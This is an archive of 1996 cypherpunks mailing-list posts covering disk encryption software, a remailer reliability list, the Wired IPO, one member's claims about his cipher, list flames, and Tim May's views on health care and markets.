Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "sharadid@cbn.net.id" <sharadid@cbn.net.id>
Date: Sun, 27 Oct 1996 07:04:11 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: No Subject
Message-ID: <01BBC453.10341900@sharadid.cbn.net.id>
MIME-Version: 1.0
Content-Type: text/plain


unsuscribe cypherpunks





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Sun, 27 Oct 1996 21:08:04 -0800 (PST)
To: Leon W Samson <linefeed@juno.com>
Subject: Re: (no subject)
In-Reply-To: <19961026.184550.12374.1.LineFeed@juno.com>
Message-ID: <Pine.BSF.3.91.961027225845.11353A-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain


God, I love Juno.

On Sun, 27 Oct 1996, Leon W Samson wrote:

> hahahahahahahahaha learn to spell dumbass!!!!!hahahahahahahahah
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sun, 27 Oct 1996 20:11:54 -0800 (PST)
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Re: considering internet/privacy periodical
Message-ID: <3.0b36.32.19961027231145.01d63788@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:31 PM 10/27/96 -0800, Timothy C. May wrote:
>The article somewhat longwindedly gets into the problems these "hot sites"
>are having. The lack of loyalty, the lack of _payment_, etc.

I would like to report that even though the WSJ site supposedly started
charging at Midnight on 20 September, I can still log on using my old free
account (and I'm not using the MS browser).  Haven't been charged yet.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike <benny@netcom.com>
Date: Sun, 27 Oct 1996 23:12:39 -0800 (PST)
To: cypherpunks@toad.com
Subject: One-time password logic/code/information?
Message-ID: <Pine.SUN.3.95.961027230407.8134A-100000@netcom6>
MIME-Version: 1.0
Content-Type: text/plain



I am looking to write a sort of password server replacement for NIS, and I
am curious as to white papers, or otherwise information on authorization
scheme's for this type of application.

Regards,

- Mike






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cypher@cyberstation.net
Date: Sun, 27 Oct 1996 22:36:35 -0800 (PST)
To: Paul Bradley <paul@fatmans.demon.co.uk>
Subject: Q.E.D   P+P == talk the talk - but - P+P != walk the walk
In-Reply-To: <846082072.4988.0@fatmans.demon.co.uk>
Message-ID: <Pine.BSI.3.95.961027220837.11706A-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain



As the former manager of the OTP Development and Analysis group at
NSA, and as the President and CEO of Mauchly - Wood Systems Corporation, 
the prime contractor at JPL and developer of cutting edge signal processing
software to seismic, well logging, NASA and other worldwide markets, you
can bet your booty that Perry, Paul and a lot of others would like to add
my scalp to their trophy case.

I am sure that all of you will recall how quickly they tried to do so, and
thought they had succeeded, a few months ago when I posted my snare
algorithm to the cypherpunks list. They leaped at the opportunity to
discredit me.

I withdrew the OTP claim and posted the ENTIRE algorithm, in a posting
 
           dated 10-24-96
           addressed to Adam Shostack,
                    and titled
Montgolfiering P Information= P log_base_infinity P, 

Since, then they they have suddenly grown silent. Nary a peep out of the
previously oh so vocal. It is obvious that they are totally clueless about
how to go about breaking the  algorithm, or they would have jumped at the
opportunity to add a notch to their analytical gun.  As becomes quickly
apparent, the algorithm cannot be broken except by brute force, which is
patently impossible.

Are they trying silent treatment where the rest of you will forget about
what is going on, and hope that I will simply disappear. All of those who 
leaped at the opportunity to take me apart before are now displaying
contemptuous intellectual pap, that is pap not the other similar word
though that also applies. Their misleading inculcations did not work so
what are they trying now. 

I believe that it is an open ommission on "non possumus." If not and they
are trying to analyze and break the algorithm, I apologize. On the
other hand, if they are being intellectually amoral,  then their
impuissance will become generally known shortly. 

Is that cabal amoral or moral? Are they intellectually honest or
dishonest. We will all know shortly. If they hide behind pitjantjatjara
words, they are revealed as being dishonest and amoral - if they look at
the algorithm and report it out factually, then they are being honest and
displaying intellectual morality. It is that simple. Let us see what
they do, who they are, and what they are.  It is in their hands to do
it right or do it wrong.

I have received 43 private messages about the montgolfiering posting from
this and the coderpunks list. I hope that some of you to go public with
your comments. Those that feel uncomfortable in doing so, please contact
me privately,

with warmest regards,

Don Wood   















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 28 Oct 1996 00:10:35 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Hey! Dr. Vuilis!
In-Reply-To: <Pine.BSI.3.91.961027191913.7416C-100000@kizmiaz.dis.org>
Message-ID: <HJ2HwD9w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


se7en <se7en@dis.org> writes:
>
> SHUT THE FUCK UP, BITCH!!!
>
> You think we can have at least one fucking week with having to listen to
> your clueless bullshit?  Or am I gonna have to put the slap down on you?
>
> Rant like a bitch, get slapped like a bitch!
>
> se7en

It's ironic that I get such e-mail even though I'm not even subscribed to
cypherpunks or coderpunks anymore. (I've been deleted from both lists several
times w/o asking, apparently by the list owner; I resubscribed; so now
majordomo@toad.com has been instructed to ignore all requests from me).

I guess this illustrates again Tim May's and John Gilmore's love of
free speech. :-)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: se7en <se7en@dis.org>
Date: Mon, 28 Oct 1996 03:09:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: BankAmerica, First USA to Use Net Software From Verifone
Message-ID: <Pine.BSI.3.91.961028033352.10805F-100000@kizmiaz.dis.org>
MIME-Version: 1.0
Content-Type: text/plain



BankAmerica Corp. and First USA Paymentech have bought Verifone Inc.'s
payment software for the Internet.

They will use VGate and VPos, Verifone's Internet commerce gateway and
merchant software. Terms of the deals were not disclosed.

A third piece of Verifone's electronic commerce offering, VWallet, will be 
available once the MasterCard-Visa Secure Electronic Transactions protocol 
for credit card payments on the Net is adopted.

Banks can use the Verifone technology to deliver private-labeled Internet
commerce services to merchant customers. BankAmerica and First USA
Paymentech join a user list that includes Wells Fargo & Co., Royal Bank of
Canada, and Hitechniaga/MBf Group of Malaysia.

BankAmerica's merchant services unit, which recently announced an initial 
public offering as a stand-alone business, processes credit and debit card 
sales for more than 150,000 merchants. 

First USA Paymentech ranks third in the merchant business. Its credit card 
issuing affiliate, First USA Bank, is one of the largest.

Roger Bertman, a vice president at Verifone, said the reason these banks "are
investing heavily in building the infrastructure" is because "the credit card 
will be the preeminent [on-line] payment instrument."

se7en

--------------------------
Majordomo list for Lam3rz:
 email majordomo@edm.net
  subscribe happyhacker
  MUWAHAHAHAHAHAHAHAHA!
--------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Edgar Swank <edgar@Garg.Campbell.CA.US>
Date: Thu, 31 Oct 1996 08:24:17 -0800 (PST)
To: Cypherpunks          <cypherpunks@toad.com>
Subject: Re: Encrypting Hard Disks
Message-ID: <ZReiwD4w165w@Garg.Campbell.CA.US>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

FCri Kaljundi wrote:

>  Tue, 22 Oct 1996, Michael B Amoruso kirjutas:
>
>> Are there any good programs out there that can encrypt my HD??  Since
>> there probably are, please mention some and where I can get them.  Also,
>> no one mention PGP.
>
>F-Secure Desktop from Data Fellows is pretty good. It uses Blowfish
>algorithm which means it is very fast on 32-bit Windows machines.
>
>More information at http://www.datafellows.com/f-secure/

- From a quick perusal of the above web site, it appears as though
F-Secure Desktop offers encryption by file, much like PGP does, only a
little more automatic.  But an entire encrypted file must be decrypted
before you can process it and the entire file must then be
re-encrypted if it is updated.

- From http://www.datafellows.com/f-secure/desktop/

    With the built-in AutoSecure(TM) feature, you can define sets of
    files, directories, and Windows 95 folders that will be
    automatically encrypted and decrypted every time you start or
    close Windows.

- From this, it appears encrypted files are decrypted while windows is
open. Obviously if Windows crashes a lot of plaintext files can be
left lying around!

I prefer the methods of SecureDrive

  http://www.stack.urc.tue.nl/~galactus/remailers/securedrive.html

or Secure Device

  ftp://utopia.hacktic.nl/pub/replay/pub/disk/secdev14.arj

in which data is decrypted "on-the-fly" as it is transferred from
disk to memory.  The data is -always- encrypted on the disk. Both of
the above use strong IDEA encryption (same as PGP) and both are
free for non-commercial use. (Commercial use is possible by paying a
small royalty to the holders of the IDEA patent; see

  http://www.ascom.ch/systec

In contrast, F-Secure Desktop is $99 a copy.

Edgar W. Swank   <edgar@Garg.Campbell.CA.US>
                 (preferred)
Edgar W. Swank   <EdgarSwank@Juno.com>
Edgar W. Swank   <Edgar_W._Swank@ilanet.org>
Edgar W. Swank   <EdgarSwank@Freemark.com>
Home Page: http://members.tripod.com/~EdgarS/index.html

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMnR3B94nNf3ah8DHAQFJQgP7BRpqrcXAMGJDNXvxQzyQE5y6E47bwSDm
CpA7X/rDmlxdm3XvB96O9jMLqtPRAbri4qoZ3hAd3jLycO/wTZV+gkxMwKxadMcC
mtGSss5fTcNP1R+MTmvHJsyWrAb9rGBs0+X7n/sGa9km+VepdKTkCbVemNRa3w7L
HoNEpkYlXeA=
=9Kp4
-----END PGP SIGNATURE-----

-- 
edgar@Garg.Campbell.CA.US (Edgar Swank)
The Land of Garg BBS -- +1 408 378-5108




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 28 Oct 1996 06:52:54 -0800 (PST)
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199610281450.GAA00559@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@miron.vip.best.com> cpunk pgp special";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'nymrod'} = '<nymrod@nym.jpunix.com> alpha pgp';
$remailer{"lead"} = "<mix@zifi.genetics.utah.edu> cpunk mix pgp hash latent cut ek";
$remailer{"exon"} = "<remailer@remailer.nl.com> cpunk pgp hash latent cut ek";
$remailer{"haystack"} = "<haystack@holy.cow.net> cpunk mix pgp hash latent cut ek";
$remailer{"lucifer"} = "<lucifer@dhp.com> cpunk mix pgp hash latent cut ek";
$remailer{"jam"} = "<remailer@cypherpunks.ca> cpunk mix pgp hash latent cut ek";
$remailer{"winsock"} = "<winsock@c2.org> cpunk pgp hash cut ksub reord";
$remailer{'nym'} = '<config@nym.alias.net> newnym pgp';
$remailer{"balls"} = "<remailer@huge.cajones.com> cpunk pgp hash latent cut ek";
$remailer{"squirrel"} = "<mix@squirrel.owl.de> cpunk mix pgp hash latent cut ek";
$remailer{"middle"} = "<middleman@jpunix.com> cpunk mix pgp hash middle latent cut ek reord";
$remailer{'cyber'} = '<alias@alias.cyberpass.net> alpha pgp';
$remailer{"dustbin"} = "<dustman@athensnet.com> cpunk pgp hash latent cut ek mix reord post";
$remailer{'weasel'} = '<config@weasel.owl.de> newnym pgp';
$remailer{"death"} = "<x@deathsdoor.com> cpunk pgp hash latent post";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(cyber mix)
(weasel squirrel)

The winsock remailer does not accept plaintext messages.

The alpha and nymrod nymservers are down due to abuse. However, you
can use the cyber nymserver. The nym.alias.net server will be listed
soon. See http://www.cs.berkeley.edu/~raph/n.a.n.html for details.

403 Permission denied errors have been caused by a flaky disk on the
Berkeley WWW server. Hopefully, this is fixed by now.

The penet remailer is closed.

When sending messages to AOL accounts, don't use mix, replay, or exon
as the last remailer in the chain - testing shows them not to work.

Last update: Mon 28 Oct 96 6:45:43 PST
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
cyber    alias@alias.cyberpass.net        ******++****    34:37 100.00%
jam      remailer@cypherpunks.ca          ************    16:20 100.00%
exon     remailer@remailer.nl.com         **##+##*##*#     1:58  99.98%
squirrel mix@squirrel.owl.de              ++++++++++-   2:45:35  99.91%
winsock  winsock@c2.org                   --.------.-   8:16:20  99.89%
lead     mix@zifi.genetics.utah.edu       ++ +++++++++    36:39  99.87%
lucifer  lucifer@dhp.com                      ++++++++    36:32  99.86%
balls    remailer@huge.cajones.com        ************     5:59  99.67%
dustbin  dustman@athensnet.com            +-+++-++-++   1:13:59  99.58%
replay   remailer@replay.com              *****+++****     8:04  99.52%
extropia remail@miron.vip.best.com        ___.--.-.--  17:10:17  99.16%
haystack haystack@holy.cow.net             +*#++##+***     3:58  98.70%
middle   middleman@jpunix.com             +--++  + +++  1:38:10  98.14%
death    x@deathsdoor.com                      *           3:20  13.75%
mix      mixmaster@remail.obscura.com     +             2:07:07   6.67%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Mon, 28 Oct 1996 07:34:10 -0800 (PST)
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: considering internet/privacy periodical
In-Reply-To: <v03007804ae9a53374232@[206.119.69.46]>
Message-ID: <199610281533.HAA00656@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


Robert Hettinga writes:
> 
> At 10:31 pm -0500 10/27/96, Timothy C. May wrote:
> > No doubt "Wired" the magazine is doing well
> > (though not amongst many of _us_, it would seem--or at least that we
> > _admit_ here), but apparently "HotWired" and "Suck" and all the rest are
> > having trouble finding their niche. Ditto for Michael Kinsley's
> > massively-touted "Slate." And a bunch of other such Web rags (no pun
> > intended, but it's not a bad one, eh?).
> 
> Actually, the report I heard on "Marketplace", NPR's business report, said
> that the market looked at the fact that Wired was more magazine than
> internet, and killed the deal, twice now. Magazine publishing is a known
> quantity, and a pretty much marginal one, too, with all the competition for
> shelfspace and mindshare in the modern magazine business. Wired lost, if I
> remember the story right, $10mil last year.

Hmm.  From what I hear from publishing industry people, the magazine
part is making a lot of money, and the other parts of wIrEd is pissing
it all away... the MSNBC people, with whom wIrEd is supposed to
do a show, are pissed off at them because the wIrEd people don't
understand video production and are wasting huge amounts of time.

> It seems to me that a magazine
> successful enough to do an IPO should have actually made money before the
> stock floats. 

That's true of most IPOs. :-)

Wired problem is that they beleive their own hype.  They also think
that everything that they touch will be as successful as the magazine, which
set all kinds of records in the publishing industry for how fast it
became profitable and got advertising $$$.

However the real problem with the IPO is that Louis Rosetto sent
a 'rah rah' email to employees (all 330 of them), telling them how
great wIrEd is and how much money they're all going to make, which
got leaked out and posted on the Well among other places.  Unfortunately
for him, this is the 'quiet period' before the IPO where SEC regs
say that the company officers can't make huge glowing pronouncements
about their company.  Oops.


-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Mon, 28 Oct 1996 04:45:44 -0800 (PST)
To: adamsc@io-online.com
Subject: Re: considering internet/privacy periodical
In-Reply-To: <19961028063026703.AAA210@io-online.com>
Message-ID: <199610281242.HAA08687@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


Adamsc wrote:
| >I'm considering putting together a periodic publication about the technical
| >and legal aspects of privacy and the Internet. My "business model" would
| >feature free WWW/email access with a charge for fax or postal delivery. I'm
| >curious to know if this strikes people as interesting or just Yet Another
| >Email Newsletter Of No Real Consequence. (no offense taken if it's the
| >latter.)
| 
| If you did a real noise-removal job, this could be very useful.  Sort of a
| privacy-RISKs digest, if you will.

	You mean like the PRIVACY digest, as occiasonally hyped in
RISKS?

Adam

-- 
"Every year the Republicans campaign like Libertarians, and then go to
Wasthington and spend like Democrats."

Vote Harry Browne for President.  http://www.harrybrowne96.org







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 28 Oct 1996 05:24:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: considering internet/privacy periodical
In-Reply-To: <3.0b28.32.19961027163228.006ad8a8@ricochet.net>
Message-ID: <v03007804ae9a53374232@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:31 pm -0500 10/27/96, Timothy C. May wrote:
> No doubt "Wired" the magazine is doing well
> (though not amongst many of _us_, it would seem--or at least that we
> _admit_ here), but apparently "HotWired" and "Suck" and all the rest are
> having trouble finding their niche. Ditto for Michael Kinsley's
> massively-touted "Slate." And a bunch of other such Web rags (no pun
> intended, but it's not a bad one, eh?).

Actually, the report I heard on "Marketplace", NPR's business report, said
that the market looked at the fact that Wired was more magazine than
internet, and killed the deal, twice now. Magazine publishing is a known
quantity, and a pretty much marginal one, too, with all the competition for
shelfspace and mindshare in the modern magazine business. Wired lost, if I
remember the story right, $10mil last year. It seems to me that a magazine
successful enough to do an IPO should have actually made money before the
stock floats. (On the other hand, magazines can live forever without ever
without making money. The greater fool theory of magazine publishing, I
guess. The Nation, never more than a century old, has never made money. The
National Review has been around since the 50's and might have made money
only few years in all that time. I don't think either one of them are
public, though...)

I guess that, like backhoes, Wall Street now also understands that Moore's
Law doesn't apply to printing presses, either. ;-).

The first Wired Ventures IPO went out as a magazine and bombed. The next
Wired Ventures deal went out as half magazine, half HotWired (though mostly
magazine in fact), and bombed. By the time Wired goes out with a new deal
-- if ever, and probably just HotWired spun off, if so -- internet hysteria
on Wall Street, currently waning, will be all but over. Deals take a long
time to ramp up. No Moore's law in industrial corporate finance, either.
(Microintermediating underwriter-bots notwithstanding, I suppose. ;-))


As for Greg's plans, I'd say do it because you love it, Greg. There's
certainly no real money in e$pam for me at the moment, but I have a small
but loyal bunch of subscribers who tell me all the time how useful it is
for them. Every once in a while, some speaking, contracting, or writing
thing comes out of it.  In the meantime, Vinnie, Rachel Wilmer, and I, and
now Anthony Templar and Fearghas McKay, keep trying out new and better ways
to wring a little money out of the content (or services, I suppose) that we
provide, if only to pay for the time and resources we've invested in it.
And, of course, for the tweakier stuff we want to do next. :-).  At some
point, for instance, we're going to try an ecash-based "begging bowl" URL,
pointing to an ecash payment page, on all the messages for e$pam and also
on the archive site we're putting up. Variable pricing, indeed.

Anyway, I think those of us doing web/mail publishing stuff like this are
doing it to say we did it, to be there first if we do something that
actually pays off. Not quite placer mining, but probably the same idea.
Like Levi Strauss and Sutter's Mill, however, it might be better business
mining the miners. If, of course, you can figure out what *that* is.
Building routers, maybe? :-). At least Moore's law applies there.

The people who keep doing it, however, are the ones who do it simply
because they like it. And, for the moment, that's why I'm doing it.
Actually, at this point, I probably can't stop. ;-).


Cheers,
Bob Hettinga



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 28 Oct 1996 05:09:34 -0800 (PST)
To: cypherpunks@toad.com
Subject: LIQ_uor
Message-ID: <1.5.4.32.19961028130830.00673900@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-25-96:

   "Litronic Releases the Fast and Powerful CipherServer."

      Litronic announced the release of a hardware-based
      add-on device for high speed processing of
      cryptographic functions. The newly released
      CipherServer holds up to eight cryptologic PC Cards
      which may concurrently process the same or different
      algorithms including RSA, DES, and FORTEZZA.

   CSI Explains Countermeasures to Cyberspace Attacks 

      Authored by an eminent authority, Dr. Dorothy E.
      Denning of Georgetown University (Washington, D.C.),
      CSI's "Manager's Guide to Cyberspace Attacks and
      Countermeasures" assists information technology
      professionals in keeping abreast of dizzying
      developments on the dark side of the virtual world.

   Target/ Electronic spies 

      The FBI is expanding the Awareness of National
      Security Issues and Response (ANSIR) program, its
      public voice in national security matters, espionage,
      counterintelligence, economic espionage and physical-
      and cyber-infrastructure protection.

   -----

   http://jya.com/liquor.txt  (10 kb for 3)

   ftp://jya.com/pub/incoming/liquor.txt

   LIQ_uor










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Mon, 28 Oct 1996 06:32:46 -0800 (PST)
To: attila@primenet.com
Subject: RE: tcmay in favour of redistribution of wealth? NFW/ROTFL
Message-ID: <9609288465.AA846523847@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain


attila@primenet.com wrote:
>et tu, Brute?  I thought I was the only one who deliberately
>stiffed the United Way,
 
I treated it as a generic example, not a specific one. For the record, I have
never donated to the United Way either.
 
>Tim redistributing the wealth?!?  I'll be ROTFL for days
>over the "insult."
 
>Come on, James, get with the program.
 
I liked Zaid Hassan's response better. In general, I try not to "get with the
program" (c.f. Two Roads Diverged in a Yellow Wood" by Robert Frost). But in
spite of my best efforts, I still find myself in a well defined demographic
group. ;-)

>in Canada, you call [redistribution of wealth] National Health
>Services which supposedly provides cradle to the grave 
>social services (which is bankrupting Canada).
 
In spite of these services the spread between Canadian and U.S. Bonds is in
favour of Canada out as far as ten years. Interest rates this morning for 90 Day
T-Bills: Canada 3.23%; U.S. 5.02%.
Remember: correlation is not causation.
 
>=There is naivete and then there is complicity.
>=jbugden@alis.com
  
>so where do you draw the line?
 
Aye, there's the rub. So far I haven't *explicitly* drawn one. And the line I
may draw now is probably different from the line I might have drawn 5 years ago
or 5 years from now. Ambiguity I can accept, its ambivalence, apathy and
agnosticism that annoy me more. 
 
Tim's occasional combination of justifiable apathy tends to be the best
combination to trigger a response.
 
Ciao,
James
 
The rules of the game: learn everything, read everything, inquire into
everything... When two texts, or two assertions, or perhaps two ideas are in
contradiction, be ready to reconcile them rather than cancel one by the other;
regard them as two different facets, or two successive stages, of the same
reality, a reality convincingly human just because it is complex.
Marguerite Yourcenar quoted in Complexification by John L. Casti.
 
Les regles du jeu: tout apprendre, tout lire, s'informer de tout... Lorsque deux
textes, deux affirmations, deux idees s'opposent, se plaire a les concilier
plutot qu'a les annuler l'un par l'autre; voir en eux deux facettes differentes,
deux etats successifs du meme fait, une realite convaincante parce qu'elle est
complexe, humaine parce qu'elle est multiple.
Margueite Yourcenar, Memoires d'Hadrien

  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 28 Oct 1996 06:44:31 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: considering internet/privacy periodical
In-Reply-To: <v03007800ae99d428af92@[207.167.93.63]>
Message-ID: <v03007801ae9a7491020a@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:58 am -0500 10/28/96, Robert Hettinga wrote:
> guess. The Nation, never more than a century old, has never made money. The
                     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Obviously, I only needed one "never" in that sentence. Which one, I leave
as an excercise for the reader. ;-).

Cheers,
Bob Hettinga



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L-Soft list server at EDS (1.8b)"             <LISTSERV@plwils00.xweb.eds.com>
Date: Mon, 28 Oct 1996 07:00:24 -0800 (PST)
To: Cypherpunks Suck <cypherpunks@toad.com>
Subject: Command confirmation request cancelled
Message-ID: <199610281500.JAA05193@plwils00.xweb.eds.com>
MIME-Version: 1.0
Content-Type: text/plain


Your command:

                             SIGNOFF COOL_TRAVELS

has remained unconfirmed  for more than 48h and is  being cancelled. If you
did want it executed but were unable to send the confirmation in time, just
re-issue the command to get a new  confirmation code. The one you were sent
before can no longer be used.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Mon, 28 Oct 1996 09:04:59 -0800 (PST)
To: cypherpunks@toad.com
Subject: RE: tcmay in favour of redistribution of wealth?
In-Reply-To: <9609288465.AA846523847@smtplink.alis.ca>
Message-ID: <v03007800ae9a9e6989f6@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



I enjoyed reading James Bugden's comments. With all the clamoring about how
"Cypherpunks write code!!"--a phrase which has been taken to mean this list
is only about "malloc" and elliptic curves--there has been very little
discussion of the "moral basis of crypto anarchy." Much of my argumentation
along these lines is contained in various places in my Cyphernomicon and in
essays written in the early days of this list (and on the Extropians list,
before the CP list existed).

While I won't get started again here, understand that my views are much
more than just "justifiable apathy" about the people of the world.

A few comments:

At 9:31 AM -0500 10/28/96, jbugden@smtplink.alis.ca wrote:
>attila@primenet.com wrote:

>>in Canada, you call [redistribution of wealth] National Health
>>Services which supposedly provides cradle to the grave
>>social services (which is bankrupting Canada).
>
>In spite of these services the spread between Canadian and U.S. Bonds is in
>favour of Canada out as far as ten years. Interest rates this morning for
>90 Day
>T-Bills: Canada 3.23%; U.S. 5.02%.
>Remember: correlation is not causation.

Agreed, of course, that correlation is not causation. And I for one draw no
firm conclusions about the U.S. vs. Canada vis-a-vis national health care.
In fact, if this was _all_ the debate was about--nationalized health
care--I would gladly accept nationalized health care if various other
obnoxious U.S. policies were dropped.

A girlfriend is from a European country, where everyone has universal
health care. She likes it. And I tend to agree that it simplifies a lot of
bookeeping. While I don't like the coercion aspects, in some sense it's
just another tax. The _efficiency_ and _effectiveness_ arguments, that a
socialized system is less efficient and effective at supplying some types
of health care, is a valid one, and I won't argue with free markets. (But
it is also true that many of us never even visit hospitals, partly, in my
case, because the web of paperwork and mandatory insurance (almost, as even
my _dentist_ is befuddled and confused when I pay cash for work done...they
are programmed to deal with insurance carriers) makes the prospect
daunting. I'll visit a hospital if and when I need to, but I fear that by
then the system will have moved to an essentially nationalized health care
system, with the disadvantages of the socialized plans _and_ the
disadvantages of the terrible U.S. legal climate...and with anyone who can
pay then being charged utterly disproportionate rates.)

However, the things about the American system that sicken me, far more than
having my taxes go up slightly to have some health care system, are the
things that add to health care costs and that make a single day's stay in a
hospital cost more than $2000. (Woe unto he who pays cash for his stay,
for, verily, he shall be soaked.) Namely, malpractice insurance related to
frivolous claims ("the CAT scan caused me to lose my psychic powers and I
deserve $3 million"), the sandbagging of medical costs ("to pay for the
deadbeats and indigents the law says we have to treat, we'll charge you $50
for an aspirin and $675 for the wheelchair we say you have to sit in
whether or not you need it"), and on and on.

(My European friend snorts when she hears things like this. In her native
country, this nonsense does not occur. _Other_ nonsense occurs, but not
this kind of nonsense. Nobody in her country could possibly win a
multimillion dollar judgment for supposedly losing her psychic powers in a
CAT scan, or any other way, for that matter.)

Having said this, I think anyone who can _afford_ an expensive medical
operation should of course be utterly free to make arrangements to have it,
with no restrictions, waiting periods, or other market distortions. Free
markets in medicine and all that. (And of course, eliminating the FDA and
letting consumers either do their own research or contracting with other
parties to look out for their interests. On the Web, we're moving in this
direction. Note that some medical and psychiatric groups are already
pushing for limits on free speech on the Net, and uses of anonymity, to
control access to this liberating information. This has direct Cypherpunks
relevance, as even the "Cypherpunks write code" chanters have to admit.)


>>so where do you draw the line?
>
